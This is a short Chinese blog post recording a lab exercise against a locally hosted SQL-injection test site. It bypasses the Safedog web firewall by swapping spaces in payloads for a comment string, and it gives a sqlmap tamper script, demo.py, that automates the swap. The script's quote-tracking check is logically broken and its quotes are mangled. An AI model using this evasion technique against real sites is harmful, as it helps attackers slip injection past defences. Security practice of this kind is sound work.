sqlmap过狗脚本练习1
徐悦TechBlog 2020-05-27
本地搭建sql注入网站练习
?
测试安全狗,输入不合法参数被安全狗拦截:
?
使用sqlmap:
?
?
检测到防护机制,失败;
先手工尝试绕过安全狗:
?
将空格替换为 “/*//\*//\*\/c*/” 成功绕过安全狗;
写个sqlmap脚本:
#demo.py
def tamper(payload,**kwargs):
retVal = payload
quote=False
if payload:
retVal = ‘‘
for i in payload:
if i =="‘" and i==‘"‘:
quote = not quote
elif i.isspace() and not quote:
retVal+=‘/*//\*//\*\/c*/‘
else:
retVal+=i
return retVal加上脚本继续跑:
?
?
成功!(之后试了几次就不行了,与安全狗的检测机制有关。。。)
相关推荐
zyjj 0喜欢 / 0评论 2020-07-04
bluet00 0喜欢 / 0评论 2020-06-25
godfather 0喜欢 / 0评论 2020-06-13
lt云飞扬gt 0喜欢 / 0评论 2020-06-09
旗木卡卡西 0喜欢 / 0评论 2020-06-02
liuyang000 0喜欢 / 0评论 2020-03-05
xuanlvhaoshao 0喜欢 / 0评论 2020-02-21
ItBJLan 0喜欢 / 0评论 2020-02-20
tanrong 0喜欢 / 0评论 2020-02-15
PinkBean 0喜欢 / 0评论 2020-02-12
gwn00 0喜欢 / 0评论 2020-02-01
一对儿程序猿 0喜欢 / 0评论 2020-01-18
xuanlvhaoshao 0喜欢 / 0评论 2020-01-02
gwn00 0喜欢 / 0评论 2020-01-09
tanrong 0喜欢 / 0评论 2019-12-22
tanrong 0喜欢 / 0评论 2019-12-16
一对儿程序猿 0喜欢 / 0评论 2019-11-10
YFCEMBEDD 0喜欢 / 0评论 2019-11-09
一对儿程序猿 0喜欢 / 0评论 2019-11-06
明月清风精进不止 0喜欢 / 0评论 2019-10-28
明月清风精进不止 0喜欢 / 0评论 2019-10-23
ALiDan 0喜欢 / 0评论 2019-10-21
cenhui 0喜欢 / 0评论 2013-02-20
gwn00 0喜欢 / 0评论 2013-08-06
qshpeng 0喜欢 / 0评论 2013-02-18
qshpeng 0喜欢 / 0评论 2013-01-22
gwn00 0喜欢 / 0评论 2012-08-14
qshpeng 0喜欢 / 0评论 2012-05-28
watertone 0喜欢 / 0评论 2011-12-26
dropkai 0喜欢 / 0评论 2011-09-21
frank0 0喜欢 / 0评论 2011-06-10
dropkai 0喜欢 / 0评论 2011-05-18
phpchandler 0喜欢 / 0评论 2011-04-20
mengsun 0喜欢 / 0评论 2011-04-18
qshpeng 0喜欢 / 0评论 2011-02-14
mengsun 0喜欢 / 0评论 2011-02-12
希望能帮助到你 0喜欢 / 0评论 2011-01-25
mengsun 0喜欢 / 0评论 2011-01-14
gwn00 0喜欢 / 0评论 2010-12-30
qshpeng 0喜欢 / 0评论 2010-12-29
zjyzz 0喜欢 / 0评论 2010-11-17
zjyzz 0喜欢 / 0评论 2010-11-09
伊恩 0喜欢 / 0评论 2014-03-18
zjyzz 0喜欢 / 0评论 2010-10-25
rumengqiang 0喜欢 / 0评论 2010-10-05